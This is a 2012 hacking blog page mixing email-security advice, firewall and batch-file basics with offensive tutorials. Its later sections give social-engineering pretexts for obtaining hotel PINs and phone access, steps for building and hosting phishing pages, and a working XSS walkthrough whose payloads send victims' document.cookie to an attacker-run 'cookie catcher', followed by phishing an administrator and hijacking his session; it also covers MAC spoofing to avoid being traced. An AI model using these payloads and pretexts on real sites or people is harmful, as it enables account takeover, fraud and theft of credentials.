HACK TRACK

Gear yourself up....

Thursday 27 September 2012

SECURE MAIL


How to protect your email account from being hacked


Protect Yourself
Nowadays the number of hackers keeps increasing. Your email account can be hacked at any time if you are not aware of basic security, so you should know how to protect your mail account.

Most people who lose their email accounts lose them because they do not know basic security practices.

Here I will explain some of the most common online scams that fool people into giving up their passwords, and how to protect yourself from them.




1. Website Spoofing:

Website spoofing is the act of creating a website with the intention of misleading its readers. The website is created by a different person or organisation (other than the original), specifically for the purpose of cheating. Normally, the website adopts the design of the target website and sometimes has a similar URL.

These sites are known as phishing web pages or fake pages. The purpose of such a page is to steal your information: username and password. The page looks similar to the original page, and its URL also looks similar to that of the original site, but it is not the right site. For example, for gmail.com a hacker may create gmailwelcome.com, which looks like gmail.com.

Solution:
✓ Never log in to or access your email account from sites other than the original site.
✓ Always type the URL of the site in the address bar to get to the site. Never click on a hyperlink to enter the site.
✓ Check whether the URL is correct.
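
The URL check in the list above can be done mechanically. This added example (not part of the original post) accepts a login URL only when its host exactly matches an allow-list; the allow-list, the brand list and every sample URL other than gmail.com and gmailwelcome.com are constructed for illustration.

```python
from urllib.parse import urlsplit

# Constructed allow-list and brand list for this example; adjust to the sites you use.
TRUSTED_HOSTS = {"gmail.com", "mail.google.com", "accounts.google.com"}
BRANDS = {"gmail", "google"}


def check_login_url(url, trusted=TRUSTED_HOSTS, brands=BRANDS):
    """Return (ok, reason) for a URL that is about to receive a password."""
    try:
        parts = urlsplit(url.strip())
    except ValueError:
        return False, "unparseable URL"
    if parts.scheme != "https":
        return False, "not https"
    # In https://gmail.com@other.example/ the real host is other.example.
    if parts.username is not None or parts.password is not None:
        return False, "userinfo before @ hides the real host"
    host = (parts.hostname or "").rstrip(".")
    if not host:
        return False, "no host"
    labels = host.split(".")
    # Look-alike letters from other alphabets show up as non-ASCII or xn-- labels.
    if not host.isascii() or any(label.startswith("xn--") for label in labels):
        return False, "internationalised look-alike host"
    if host in trusted:
        return True, "exact match"
    # Everything below is rejected; the reason names the spoofing pattern.
    if any(host.startswith(t + ".") for t in trusted):
        return False, "trusted name used as a subdomain of another domain"
    if any(b in label for b in brands for label in labels):
        return False, "brand name in a host that is not on the allow-list"
    return False, "host not on the allow-list"


if __name__ == "__main__":
    samples = [  # constructed sample URLs
        "https://gmail.com/",
        "https://gmailwelcome.com/login",
        "http://gmail.com/",
        "https://gmail.com@gmailwelcome.com/",
        "https://gmail.com.signin.example/",
    ]
    for u in samples:
        print(u, "->", check_login_url(u))
```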

2. Protecting from Keyloggers:
To learn about keyloggers and how to prevent them, read this tutorial.

3. Accessing Your Email Account from Cyber Cafes

Do you access your email from cyber cafes? Then you are definitely at risk of losing your password. In fact, many people lose their email accounts in cyber cafes. For the owner of the cyber cafe, it is a cakewalk to steal your password: he just needs to install a keylogger on his computers. So when you log in to your email account from such a PC, you give away your password to the cafe owner. There are also many Remote Administration Tools (RATs) which can be used to monitor your browsing activities in real time.

This doesn't mean that you should never use cyber cafes for browsing the internet. I know that not all cyber cafe owners are so wicked, but it is recommended not to use cafes for accessing confidential information. When it comes to security, never trust anyone, not even your friend. I always use my own PC to log in to my accounts to ensure safety.

SECURE SYSTEM FROM KEY LOGGERS


How to secure your system from Keyloggers


Nowadays keyloggers are a major problem for everyone, so we should learn to secure our computers from them. This article will help ethical hackers and anyone who wants to protect their PC.


What is Keylogger?

A keylogger is a type of spyware that records what you type on the keyboard and sends it to the hacker who planted it. Hackers mainly use keyloggers to steal your passwords, credit card numbers and other confidential data. So whenever you type your username and password in Gmail or online banking sites, the keylogger sends them to the hacker.

How to Protect?

To secure your system, you must have:

Good Antivirus:
This is the basic and best step to protect your system from keyloggers. Buy a licensed antivirus, the best currently on the market. My suggestion is Kaspersky, Norton or McAfee. Don't forget to update it regularly.
Note: Don't use a trial or cracked pack; it is worthless.

Good Antispyware:
Since keyloggers are basically spyware, if you are a frequent Internet user you could be exposed to thousands of keyloggers and other spyware. So you should use a good antispyware program such as NoAdware.


Antilogger can be Handy

Antiloggers are programs that detect the presence of

WHAT IS FIREWALL?


Introduction to firewalls
When you use the internet in your college, school or office, you may not be able to access some websites, right? Do you know how they block those websites? They use firewalls to block them. A firewall also protects the system from hackers' attacks. Let us see what a firewall is.

What is Firewall?
A firewall works like a security guard standing outside an office. What does the security guard usually do? He allows in those who have an identity card and blocks those who do not. Likewise, the firewall blocks unauthorized access to the system.
A firewall may be software or hardware. It works based on a set of rules defined by the administrator. Using a firewall, the administrator can block certain websites from being accessed.
All traffic from inside and outside of the network must pass through the firewall.
Only authorized traffic is allowed to pass (based on the set of rules).



Types of Firewalls
 Packet Filtering
 Application Level Gateway
 Circuit Level Gateway

Packet Filtering (Network Layer)
A packet filtering router applies a set of rules to each incoming IP packet and then forwards or discards the packet. The router is configured so that it can filter both incoming and outgoing packets. Packets are filtered based on the source and destination IP addresses.
IP spoofing attacks are possible against this kind of packet filtering. IP spoofing is achieved by changing the source IP address of packets.

Stateful Inspection Firewalls
A stateful inspection packet filter tightens the rules for TCP traffic by creating a state table of outbound TCP connections. If a packet matches an existing connection in the state table, it is allowed. If it does not match, it is evaluated according to the rule set for new connections.
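
The difference between the two filters can be shown with a small simulation. This is an added example, not code from the original post: the network range, addresses, ports and the simplified teardown on RST are assumptions, and it shows a forged "reply" packet passing the stateless rule but failing the state-table lookup.

```python
import ipaddress
from collections import namedtuple

# direction is "in" (arriving from the Internet) or "out" (leaving the LAN).
# flags is a string of TCP flag letters: S=SYN, A=ACK, R=RST.
Packet = namedtuple("Packet", "direction src sport dst dport flags")

LAN = ipaddress.ip_network("192.168.1.0/24")  # constructed internal network


def packet_filter(pkt):
    """Stateless filter: every packet is judged alone, from its header fields."""
    if pkt.direction == "out":
        return "allow"
    # Rule meant to let HTTPS replies back in: source port 443, high destination port.
    if pkt.sport == 443 and pkt.dport > 1023 and ipaddress.ip_address(pkt.dst) in LAN:
        return "allow"
    return "drop"


class StatefulFirewall:
    """Keeps a state table of outbound TCP connections, as described above."""

    def __init__(self):
        # State table entries: (lan_ip, lan_port, remote_ip, remote_port)
        self.connections = set()

    def new_connection_rules(self, pkt):
        # Rule set for packets that match no existing connection:
        # only an outbound SYN may open a connection; nothing inbound may.
        if pkt.direction == "out" and pkt.flags == "S":
            self.connections.add((pkt.src, pkt.sport, pkt.dst, pkt.dport))
            return "allow"
        return "drop"

    def filter(self, pkt):
        # Anti-spoofing: a packet arriving from outside cannot have a LAN source.
        if pkt.direction == "in" and ipaddress.ip_address(pkt.src) in LAN:
            return "drop"
        if pkt.direction == "out":
            key = (pkt.src, pkt.sport, pkt.dst, pkt.dport)
        else:
            key = (pkt.dst, pkt.dport, pkt.src, pkt.sport)
        if key in self.connections:
            if "R" in pkt.flags:  # simplified teardown: a reset ends the connection
                self.connections.discard(key)
            return "allow"
        return self.new_connection_rules(pkt)


if __name__ == "__main__":
    fw = StatefulFirewall()
    # Constructed packets: a forged "reply" with no matching outbound connection,
    # then a real outbound SYN and its genuine reply.
    forged = Packet("in", "203.0.113.9", 443, "192.168.1.20", 50000, "A")
    syn = Packet("out", "192.168.1.20", 50000, "198.51.100.7", 443, "S")
    reply = Packet("in", "198.51.100.7", 443, "192.168.1.20", 50000, "SA")
    print("forged, stateless:", packet_filter(forged))
    print("forged, stateful: ", fw.filter(forged))
    print("outbound SYN:     ", fw.filter(syn))
    print("genuine reply:    ", fw.filter(reply))
```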


Application Level Gateway
An application level gateway is also known as a proxy server. The user communicates with the gateway using the application layer of the TCP/IP stack. The gateway asks the user for the name of the remote host to be connected. When the user enters a valid user ID, the gateway gives access to the remote application. This blocks malicious activity and corrects the application behavior, which ensures the safety of the company.
It is more secure than packet filtering, and it is easy to log and audit all incoming traffic at the application level. Application-level filtering may include protection against spam and viruses as well, and be able to block undesirable Web sites based on content rather than just their IP address.

Circuit Level Gateway
The circuit level gateway works at the session layer of the OSI model. It monitors TCP handshaking between packets to make sure a session is legitimate. Traffic is filtered based on the session rules. Circuit-level firewalls hide the network itself from the outside, which is useful for denying access to intruders, but they don't filter individual packets. This firewall is used when the administrator trusts internal users.

Why Firewall?
A firewall blocks unauthorized users and prohibits vulnerable services from entering or leaving the network.
Protection from IP spoofing and routing attacks.
Protection against remote login, Trojan backdoors, session hijacking, cookie stealing, etc.

Limitations of Firewalls
The firewall cannot protect against attacks that bypass the firewall.
The firewall does not protect against internal threats.
The firewall cannot protect against the transfer of virus-infected programs or files. It would be impossible for the firewall to scan all incoming files and emails for viruses.

BATCH PROGRAMMING


What is Batch file?
Batch files are a list of command line instructions that are "batched" together in one file. Most of the command lines can be executed within the command prompt, but batch files make the work load much easier. Batch files can be opened, copied, and edited using notepad.

They are used for simple routines and low-level machine instruction. On Windows, many batch files can be seen within the c:\Windows directory.

Batch files, more or less, make up the backbone of the Windows Operating System. The operating system must have access to these files and be able to add and delete instructions from them. Delete them, and you have effectively disabled the OS.



Basic Batch File Utilities and Commands


Note: Any DOS command can be used within a batch file; below is a list of commands used to support the structure and flow of the batch file.

@
Place @ in front of commands that you don't want echoed within the process.

CLS
Clears the screen of any previous data.

CALL
Calls another batch file. Once the other batch file is finished, control is returned to the first (i.e. CALL c:\Windows\Newbat.bat).

BREAK ON/OFF
When turned on within the batch file, the user has the option of stopping the batch file by pressing Ctrl+Break.

GOTO
This command is used to go to another section of the batch file. Sections can be added by putting a colon in front of a name (i.e. :FIRSTSECTION, :SECONDSECTION):

:FIRSTSECTION
REM Welcome to the first section
GOTO :SECONDSECTION

:SECONDSECTION
REM Welcome to the second section
GOTO :END
:END

It is possible to loop with the GOTO command:

:START
REM NO!!!!!!!!!!!!!!!!!! IT'S LOOPING!!!!!!!!!!!!!
GOTO :START

PAUSE
The pause command halts a process until a key is hit by the user. Displays the message, "Press any key to continue..."

REM
Allows a remark to be placed within the code, displaying a message to the user (i.e. REM HELLO!).

ECHO ON
Command process is shown to user; @ is usually placed before (@ECHO ON).

ECHO OFF
Command process is not shown to the user; @ is usually placed before (@ECHO OFF).

end
Ends the process.


A simple batch program to show a hello message is:

@echo off
echo "hello world"

Type this code into Notepad and save it with a .bat extension (e.g. hello.bat).

By double-clicking the batch file, you can run it. The batch file above will show the hello world message, but we can't see it because the window opens and closes within a second.

We will see later how to see it.

SECURE THE INTERNET CONNECTION



How To Hide your IP address and encrypt your connection

Next, you need a VPN (Virtual Private Network). This will hide your IP address and encrypt your connection.

Step1: Download Hotspot Shield.

Note: If you can afford a paid VPN, it is recommended, but a good free one is Hotspot Shield.

Step2: Once you have downloaded and installed it, a web page should open up and it should connect to the VPN.


Note: You cannot go to some sites when using a VPN. This is because of security.

Congratulations! You now have a VPN!

MAC SPOOFING




First we will spoof our MAC address.

MAC stands for "Media Access Control". It is commonly used by the authorities to trace hackers. To make it harder to trace us, we can change it!

Step1: Firstly, download the Program NMAC:

Step2: After you have installed it, open it up, and click proceed. You should see a list at the top of the window.
Click on the first one.


Note: The drop-down box under “Network Connection" changes.

If you are using a wired connection, you need to select the one that says “Local Area Connection". If you are using a wireless connection, you need to select the one that says “Wireless Network Connection". If you are using a VPN, that should be visible too.

Step3: Once you have found the correct one, click "Random" as many times as you like.

Step4: Now click on "Update MAC".

Click "Yes" to the window that follows, and wait until you get a window telling you that the adapter was restarted successfully.

Now you just spoofed your MAC address!

TOP 10 HACKING TECHNIQUES OF 2009



1. Creating a rogue CA certificate
Alexander Sotirov, Marc Stevens, Jacob Appelbaum, Arjen Lenstra, David Molnar, Dag Arne Osvik, Benne de Weger

2. HTTP Parameter Pollution (HPP)
Luca Carettoni, Stefano diPaola

3. Flickr's API Signature Forgery Vulnerability (MD5 extension attack)
Thai Duong and Juliano Rizzo

4. Cross-domain search timing
Chris Evans

5. Slowloris HTTP DoS
Robert Hansen, (additional credit for earlier discovery to Adrian Ilarion Ciobanu & Ivan Ristic - “Programming Model Attacks” section of Apache Security for describing the attack, but did not produce a tool)

6. Microsoft IIS 0-Day Vulnerability Parsing Files (semi-colon bug)
Soroush Dalili

7. Exploiting unexploitable XSS
Stephen Sclafani

8. Our Favorite XSS Filters and how to Attack them
Eduardo Vela (sirdarckcat), David Lindsay (thornmaker)

9. RFC1918 Caching Security Issues
Robert Hansen

10. DNS Rebinding (3-part series Persistent Cookies, Scraping & Spamming, and Session Fixation)
Robert Hansen

SOCIAL ENGINEERING


What is Social Engineering?
Social engineering is the act of manipulating people into performing actions or divulging confidential information, rather than by breaking in or using technical cracking techniques.[1] While similar to a confidence trick or simple fraud, the term typically applies to trickery or deception for the purpose of information gathering, fraud, or computer system access; in most cases the attacker never comes face-to-face with the victim.


"Social engineering" as an act of psychological manipulation was popularized by hacker-turned-consultant Kevin Mitnick. The term had previously been associated with the social sciences, but its usage has caught on among computer professionals.

Some Examples
Example 1: You receive an e-mail whose sender claims to be the manager or someone acting on behalf of the support department of your bank.

In the message he says that the Internet Banking service is presenting a problem and that this problem can be corrected if you run the application attached to the message.

Running this application presents a screen similar to the one you use to access your bank account, waiting for you to type your password. In fact, the application is designed to steal your password for the bank account and send it to the attacker.

Example 2: You receive an e-mail saying that your computer is infected by a virus. The message suggests that you install a tool available on an Internet site to eliminate the virus from your computer.

The real function of this tool is not to eliminate a virus but to give someone access to your computer and all data stored on it.

Example 3: A stranger calls your house and says he is from the technical support of your ISP.
On the call he says that your connection to the Internet is presenting a problem and then asks for your password to fix it. If you give your password, this so-called technician can perform a multitude of malicious activities using your Internet access account, and those activities will therefore be tied to your name.

Practical Examples:

Retail Paging Systems
---------------------
Wal-Mart store phones have clearly marked buttons for the paging system. Wal-Mart is
the exception, not the rule. So how do you get on the paging system to have a little
fun when you're bored out of your mind shopping with your girlfriend? Social
engineering, my whipped friend. Find a phone and dial an extension, preferably the
store op. The key here is to become a harried employee, saying something similar
to..."This is Bill in shoes. What's the paging extension?" More often than not,
you'll get the extension without another word. Now, get some by saying something
sweet over the intercom.

Airport White Courtesy Phones
-----------------------------
Imagine you've already been strip searched and you're waiting for your delayed
flight. Naturally, you gravitate to a phone. Is it white? Then you've got a free
call right in front of you. Just pick up to get the op. "This is Bill at Southwest,
Gate A5. We're swamped and our phones are tied. Can I get an outside line?" If
the phone does not have DTMF, or the op wants to dial the call for you, do not call
a number related to you.

Hotels
------
Hotels hold such promise. Some hotels have voice mail for each room, guests
receiving a PIN when they check in. Hotels also have "guest" phones; phones outside
of rooms that connect only to rooms or the front desk. Pick up a guest phone, make
like a friendly guest and say, "I forgot my PIN. Could I get it again? Room XXX."
Knowing the registered name of the target room helps, for the Hotel and Restaurant
Management Degree Program graduate may ask for it.

Do not follow through with the next social engineering example. Or, like the author,
try it on a friend. Go to the front desk and tell the attendant that you've locked
your key (card) in the laundromat, in your room, lost it, etc. Do not try this with
the attendant that checked you in. And again, do not enter someone's room without
permission.


Calling Technical Support
-------------------------
So you've found a new-fangled computerized phone and you want to learn more about it.
Do the same thing you do when you have trouble with your AOL - call tech support.
First, do a little planning (after getting the tech support number off of the phone
or the web). Get some info on the phone, like phone number, model number, other
identifying numbers, etc. Also, know the name of the facility in which the phone is
located. Now that you've got some ammo, you're ready to make the call. Posing as an
employee of the facility, call tech support and make up a problem for the phone
you've identified. Act a little dumb and be apologetic, acting like you don't want
to waste their time. All the while, pumping them for information - "I hate to bug
you for this, but <insert problem here>." <You'll get some info from tech support
here.> <Build on what you've learned and curiously ask another question.> And so
on until you reach the point where you can feel that it's time to end the call.
Occasionally acting amazed at their knowledge may be helpful.


Methods of Social Engineering

Phishing
Phishing is a technique of fraudulently obtaining private information. Typically, the phisher sends an e-mail that appears to come from a legitimate business — a bank, or credit card company — requesting "verification" of information and warning of some dire consequence if it is not provided. The e-mail usually contains a link to a fraudulent web page that seems legitimate — with company logos and content — and has a form requesting everything from a home address to an ATM card's PIN.

For example, 2003 saw the proliferation of a phishing scam in which users received e-mails supposedly from eBay claiming that the user's account was about to be suspended unless a link provided was clicked to update a credit card (information that the genuine eBay already had). Because it is relatively simple to make a Web site resemble a legitimate organization's site by mimicking the HTML code, the scam counted on people being tricked into thinking they were being contacted by eBay and subsequently, were going to eBay's site to update their account information. By spamming large groups of people, the "phisher" counted on the e-mail being read by a percentage of people who already had listed credit card numbers with eBay legitimately, who might respond.

Vishing or Phone Phishing:
This technique uses an Interactive Voice Response (IVR) system to recreate a legitimate-sounding copy of a bank or other institution's IVR system. The victim is prompted to call in to the "bank" via a phone number provided in order to "verify" information.

Baiting
Baiting is like the real-world Trojan Horse that uses physical media and relies on the curiosity or greed of the victim. In this attack, the attacker leaves a malware-infected floppy disc, CD ROM, or USB flash drive in a location sure to be found, gives it a legitimate-looking and curiosity-piquing label, and simply waits for the victim to use the device.

Quid pro quo
Quid pro quo means something for something:

* An attacker calls random numbers at a company claiming to be calling back from technical support. Eventually they will hit someone with a legitimate problem, grateful that someone is calling back to help them. The attacker will "help" solve the problem and in the process have the user type commands that give the attacker access or launch malware.

* In a 2003 information security survey, 90% of office workers gave researchers what they claimed was their password in answer to a survey question in exchange for a cheap pen. Similar surveys in later years obtained similar results using chocolates and other cheap lures, although they made no attempt to validate the passwords.

EMAIL ATTACKS


Email account hacking is the most basic level of hacking, and it is the first thing most people want to try. So here is a tutorial for budding hackers about email hacking.

There are different types of email account hacking. Here are some of them:

Social Engineering
Phishing
Brute Force Attack
Keylogger
Guessing the Answer for the Security Question


SOCIAL ENGINEERING:

Social engineering takes advantage of the weakest link in any organization’s
information security defenses: people. Social engineering is
“people hacking” and involves maliciously exploiting the trusting nature of
human beings to obtain information that can be used for personal gain.

Social engineering is one of the toughest hacks to perpetrate because it takes
great skill to come across as trustworthy to a stranger. It’s also by far the
toughest hack to protect against because people are involved.

Social engineering is different from physical security exploits. In social engineering, hackers analyze the victim and then send mail to the victim with contents related to the victim.

E.g.:

✓ False support personnel claim that they need to install a patch or new
version of software on a user’s computer, talk the user into downloading
the software, and obtain remote control of the system.
✓ False vendors claim to need to update the organization’s accounting
package or phone system, ask for the administrator password, and
obtain full access.
✓ Phishing e-mails sent by external attackers gather user IDs and passwords
of unsuspecting recipients. Hackers then use those passwords to
gain access to bank accounts and more. A related attack exploits cross-site
scripting on Web forms.
✓ False employees notify the security desk that they have lost their keys
to the computer room, receive a set of keys from security, and obtain
unauthorized access to physical and electronic information.

Phishing WebPage:

A phishing webpage is a fake webpage that looks similar to the original page of the website. Using this webpage we can easily get the passwords of victims. The steps involved in creating a phishing webpage are:
✓ First visit the website which is associated with the email ID. Copy the source code.
✓ Edit the source code such that it will store the password for you.
✓ Upload the webpage to any free web hosting site (don't select a famous hosting site; they will find that your page is fake). Try uploading through a proxy server.

Guessing the Answer for Security Question:
Do you remember that mail sites ask security questions to recover the mail account? You can hack the mail account simply by guessing the answer. If the victim is your friend, then it may be very easy to hack.



BRUTE FORCE ATTACK:



This is a famous and traditional attack method. In this method, the password is found by trying all possible passwords with a program or other software.




KEYLOGGERS:


A keylogger is spyware that captures what you type on the keyboard, so whenever you type your username and password, it simply captures them.

It is a software program that is attached to other software and sent to the victim. When the victim installs the software, the keylogger also starts to work. Keyloggers are exe files.

CROSS SITE SCRIPTING (XSS):COOKIE GRABBING


XSS comes in two types: Persistent and Non-Persistent.

For XSS we will use something called a cookie catcher.
The question is: why would we need someone else's cookie?
The answer is that we can change our browser's cookies to log in as them! Let's call it Session Hijacking.

First go to a free hosting site like http://www.110mb.com or other php hosting sites and register there. Then download this cookie catcher and upload it.

Cookie Catcher: http://adf.ly/Tdbm


What does the cookie catcher do?
It grabs the user's:
Cookies
IP
Referrer link (the page from which the user reached that link)
Time and Date

Get Vulnerable sites:

OK, first we need sites that are vulnerable to XSS so that it will work on them.
To test a site we need to add some code after the link.
I will use this site, which many of you have probably seen before.
http://adf.ly/Tdo3

Now, to test whether a site is vulnerable, you can add these codes:


Code:
"><script>alert(document.cookie)</script>
Code:
'><script>alert(document.cookie)</script>
Code:
"><script>alert("Test")</script>
Code:
'><script>alert("Test")</script>
Or a new one which I found out myself, with which you can inject HTML:
Code:
"><body bgcolor="FF0000"></body>
Code:
"><iframe src="www.google.com" height=800 width=800 frameborder=1 align=center></iframe>



If we see a JavaScript popup, or if you used my tests and saw the page's background go black or a Google page open inside that site, it means the site is vulnerable to XSS attacks.

In the end, if your site is http://www.example.com the link to test it would be: http://www.example.com/index.php?id="><script>alert(document.cookie)</script>




Persistent XSS:

In this method we will grab the victim's cookies without raising suspicion and in complete stealth.
Now assume we have a forum which has HTML enabled, or a site with a comment page that is vulnerable to XSS.
OK, now let's go to this site: http://adf.ly/Tdo3
Now test and see if the XSS vulnerability tests work on it.
It does! And you are getting one of the vulnerability's symptoms. So now let's try to grab its cookies. If there is a box to type in and submit, add this:



Code:
<script>document.location="www.you.110mb.com/cookie catcher.php?c=" + document.cookie</script>
and submit that post in the forum or the comment box. It is also good to add something before the code, like: hey i got a problem logging in???
so they won't suspect you.

Refresh the page, then go to the newly created page: in the same directory where you saved your cookie catcher .php, look for cookies.html, a new file that shows you the cookies. For example, if your cookie catcher link is:
http://www.example.com/cookie catcher.php
the container of the cookies would be:
http://www.example.com/cookies.html

Now visit cookies.html and you would see the session of that cookie!



PS: The site I used doesn't support cookies, so you can use http://adf.ly/TeZV for cookie support.

Now there is another way to do a cookie-grabbing drive-by; add this code and post it:


Code:
<iframe frameborder=0 height=0 width=0 src=javascript:void(document.location="www.you.110mb.com/cookie catcher.php?c=" + document.cookie)</iframe>


Then post it in the forum or the comment box.
This will open an iframe in the page, which will allow you to have the same page in that website. If you don't know about iframes, make a new HTML file on your computer and just do a

<iframe src="www.google.com"></iframe> and you will understand iframes more

Of course, the site needs to support cookies! A blank JavaScript popup means you need to go to another site.



Non-Persistent XSS:

OK, in this method we will make the victim admin go to our link. First we pick an XSS-vulnerable site. For this method we need a search.php page that is vulnerable to XSS and has cookies. In the vulnerable search.php, in the textbox for the search term, type:
Code:
<script>alert(document.cookie)</script>

and click the search button. If you see a JavaScript popup, it means the page is vulnerable to a Non-Persistent XSS attack. Now we will do something similar.
I will use this link for this method: http://adf.ly/TeZV
Now in front of the search.php?search= add this:
Code:
"><script>document.location="www.you.110mb.com/cookie catcher.php?c=" + document.cookie</script>
Now go to http://www.tinyurl.com and shorten the whole page's link. Try to find a site administrator's e-mail on that vulnerable website and send a fake mail from an online fake mailer like this one:
http://hackcommunity.com/Thread-Anonymou...to-any-any

Now in the body just say something fake like: Hey i found a huge bug in your website! and give him the shortened link of the search.php with the code added in front of it. TinyURL will mask it, and once he goes to the link you will see his cookies in your cookies.html, and he will just be redirected to the link in your cookie catcher. No matter what he does, even if he changes his password, you can still log in as him.


Session Hijacking:

OK, now you have the admin's cookies either way, so we need to edit our own browser's cookies. First go to that site's admin login or its main page and delete ALL of your cookies for that site. Now go to your cookies.html page and copy everything in front of the Cookie: into an open Notepad. The ; separates cookies from each other, so first copy the code before the ; .
Now go to that vulnerable website and clear the link. Instead add this:
Code:
Javascript:void(document.cookie="")
or, for example:
Code:
Javascript:void(document.cookie="__utma=255621336.1130089386.1295743598.1305934653.1305950205.86")
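
From the defender's side, two controls break the steps described in this post: encoding user input before it is written into HTML, and marking the session cookie HttpOnly so that document.cookie cannot read it. The following is an added example, not code from the original post; the template, the cookie name and the session value are constructed, and the test strings are the ones quoted above.

```python
import html
from html.parser import HTMLParser
from http.cookies import SimpleCookie

# Test strings quoted in the post above.
PAGE_TEST_STRINGS = [
    '"><script>alert(document.cookie)</script>',
    "'><script>alert(document.cookie)</script>",
    '"><body bgcolor="FF0000"></body>',
]


def render_vulnerable(value):
    """The 'before': user input is pasted into an attribute unchanged."""
    return '<input name="id" value="%s">' % value


def render_safe(value):
    """The fix: encode &, <, >, " and ' so the input stays inside the attribute."""
    return '<input name="id" value="%s">' % html.escape(value, quote=True)


class _TagCollector(HTMLParser):
    def __init__(self):
        super().__init__()
        self.tags = []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)


def tags_created(markup):
    """Parse markup the way a browser would and list the elements it creates."""
    collector = _TagCollector()
    collector.feed(markup)
    collector.close()
    return collector.tags


def session_cookie_header(session_id):
    """Build a Set-Cookie value that page scripts cannot read."""
    cookie = SimpleCookie()
    cookie["session"] = session_id          # constructed cookie name
    cookie["session"]["httponly"] = True    # hidden from document.cookie
    cookie["session"]["secure"] = True      # sent over HTTPS only
    cookie["session"]["samesite"] = "Strict"
    cookie["session"]["path"] = "/"
    return cookie["session"].OutputString()


if __name__ == "__main__":
    for s in PAGE_TEST_STRINGS:
        print("unsafe:", tags_created(render_vulnerable(s)),
              "safe:", tags_created(render_safe(s)))
    print("Set-Cookie:", session_cookie_header("abc123"))
```

Because the session identifier is also invalidated only when the server ends the session, logging out all sessions after a suspected theft matters more than changing the password.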